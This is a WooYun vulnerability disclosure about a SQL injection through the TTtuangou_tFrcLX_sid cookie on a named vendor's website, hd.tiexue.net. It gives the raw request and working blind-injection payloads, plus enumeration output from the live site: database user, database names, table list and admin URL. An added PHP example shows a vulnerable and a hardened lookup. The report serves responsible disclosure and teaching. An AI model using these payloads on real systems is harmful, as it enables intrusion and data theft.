
Vulnerability summary

Defect ID: wooyun-2015-0119209

Title: SQL injection via a Cookie parameter at 铁血科技 (Tiexue Technology)

Vendor: 北京铁血科技 (Beijing Tiexue Technology)

Author: 路人甲

Submitted: 2015-06-09 15:21

Fixed: 2015-07-26 12:24

Published: 2015-07-26 12:24

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-09: Details sent to the vendor; awaiting vendor response
2015-06-11: Vendor confirmed; details disclosed to the vendor only
2015-06-21: Details disclosed to core white hats and domain experts
2015-07-01: Details disclosed to regular white hats
2015-07-11: Details disclosed to intern white hats
2015-07-26: Details disclosed to the public

Brief description:

233

Detailed description:

This is one of those holes where only the exact spot you point at gets fixed; I hope the vendor takes it seriously this time. The `TTtuangou_tFrcLX_sid` cookie is injectable on the front page:
GET / HTTP/1.1
Cookie: TTtuangou_tFrcLX_sid=1; TTtuangou_tFrcLX_loginref=http%3A%2F%2Fhd.tiexue.net%2F
X-Requested-With: XMLHttpRequest
Referer: http://hd.tiexue.net/
Host: hd.tiexue.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
The same cookie is read on pages like these as well:
/activity_1.html
/admin.php
/reserve_1.html
/view-136.html
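The root cause of a cookie-parameter injection of this kind is that the session id from the cookie is spliced into the SQL text instead of being bound as a parameter. The following PHP is an added example and is not code from the original report or from the vendor's application; it assumes a PDO connection and a hypothetical `sessions` table with `sid` and `uid` columns (the real schema is not on this page). It places the vulnerable lookup next to a hardened one that validates the cookie's shape and then uses a prepared statement, and runs both against an in-memory SQLite database with constructed sample data.

```php
<?php
// Added example, not from the original report or the vendor's code base.
// Assumes: a PDO connection and a hypothetical table `sessions` (sid, uid).

// VULNERABLE pattern: the cookie value is concatenated into the SQL string,
// so a single quote inside TTtuangou_tFrcLX_sid changes the query structure.
function lookupSessionVulnerable(PDO $pdo, array $cookie): ?array
{
    $sid = $cookie['TTtuangou_tFrcLX_sid'] ?? '';
    $sql = "SELECT uid FROM sessions WHERE sid = '" . $sid . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED pattern: reject anything that does not look like a session id,
// then bind the value as a parameter so it can never be parsed as SQL.
function lookupSessionSafe(PDO $pdo, array $cookie): ?array
{
    $sid = $cookie['TTtuangou_tFrcLX_sid'] ?? '';
    // Assumption for this example: session ids are short decimal integers
    // (the benign value in the report is "1"). Adjust the pattern to the
    // real id format; the point is an allow-list check before any SQL.
    if (!preg_match('/^[0-9]{1,18}$/', $sid)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT uid FROM sessions WHERE sid = :sid');
    $stmt->execute([':sid' => $sid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration with constructed sample data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE sessions (sid TEXT PRIMARY KEY, uid INTEGER)');
$pdo->exec("INSERT INTO sessions (sid, uid) VALUES ('1', 42)");

$benign    = ['TTtuangou_tFrcLX_sid' => '1'];
$tautology = ['TTtuangou_tFrcLX_sid' => "x' OR '1'='1"]; // classic quote break-out

var_dump(lookupSessionVulnerable($pdo, $benign));
var_dump(lookupSessionVulnerable($pdo, $tautology));
var_dump(lookupSessionSafe($pdo, $benign));
var_dump(lookupSessionSafe($pdo, $tautology));
```

Run under the PHP CLI, the vulnerable lookup returns the stored row for both cookies, because the quote in the second value closes the string literal and the `OR` makes the `WHERE` clause true for every row; the hardened lookup returns the row only for the benign cookie and returns `null` for the malformed one before any query is issued. The prepared statement alone would already prevent the injection; the format check in front of it additionally gives you a cheap place to log and alert on cookies that do not match the expected shape.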

Proof of vulnerability:

---
Parameter: TTtuangou_tFrcLX_sid (Cookie)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: TTtuangou_tFrcLX_sid=1' RLIKE (SELECT (CASE WHEN (2866=2866) THEN 1 ELSE 0x28 END)) AND 'EZwI'='EZwI; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: TTtuangou_tFrcLX_sid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xksz) AND 'gANi'='gANi; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/
---
web application technology: Nginx, PHP 5.4.7
back-end DBMS: MySQL 5.0.12
current user: 'hdu@localhost'
available databases [3]:
[*] information_schema
[*] test
[*] txhddata
Database: txhddata
[59 tables]
+--------------------------------------+
| cenwor_system_failedlogins |
| cenwor_system_log |
| cenwor_system_memberfields |
| cenwor_system_members |
| cenwor_system_onlinetime |
| cenwor_system_report |
| cenwor_system_robot |
| cenwor_system_robot_ip |
| cenwor_system_robot_log |
| cenwor_system_role |
| cenwor_system_role_action |
| cenwor_system_role_module |
| cenwor_system_sessions |
| cenwor_tttuangou_activity |
| cenwor_tttuangou_activity_user |
| cenwor_tttuangou_address |
| cenwor_tttuangou_api_apps |
| cenwor_tttuangou_api_protocol |
| cenwor_tttuangou_api_session |
| cenwor_tttuangou_article |
| cenwor_tttuangou_attrs |
| cenwor_tttuangou_attrs_cat |
| cenwor_tttuangou_attrs_order |
| cenwor_tttuangou_catalog |
| cenwor_tttuangou_city |
| cenwor_tttuangou_city_place |
| cenwor_tttuangou_comments |
| cenwor_tttuangou_express |
| cenwor_tttuangou_express_area |
| cenwor_tttuangou_express_cdp |
| cenwor_tttuangou_express_corp |
| cenwor_tttuangou_express_printer_log |
| cenwor_tttuangou_finder |
| cenwor_tttuangou_links |
| cenwor_tttuangou_metas |
| cenwor_tttuangou_order |
| cenwor_tttuangou_order_clog |
| cenwor_tttuangou_paylog |
| cenwor_tttuangou_payment |
| cenwor_tttuangou_prize_phone |
| cenwor_tttuangou_prize_ticket |
| cenwor_tttuangou_prize_ticket_win |
| cenwor_tttuangou_product |
| cenwor_tttuangou_push_log |
| cenwor_tttuangou_push_queue |
| cenwor_tttuangou_push_template |
| cenwor_tttuangou_question |
| cenwor_tttuangou_recharge_card |
| cenwor_tttuangou_recharge_order |
| cenwor_tttuangou_regions |
| cenwor_tttuangou_reports |
| cenwor_tttuangou_seller |
| cenwor_tttuangou_service |
| cenwor_tttuangou_subscribe |
| cenwor_tttuangou_ticket |
| cenwor_tttuangou_uploads |
| cenwor_tttuangou_usermoney |
| cenwor_tttuangou_usermsg |
| cenwor_tttuangou_zlog |
+--------------------------------------+
Admin backend URL: http://hd.tiexue.net/admin.php

Suggested fix:

~~~~~~~~·

Copyright notice: please credit the source 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-06-11 12:23

Vendor reply:

Many thanks to 路人甲; we will fix this promptly.

Latest status:

None yet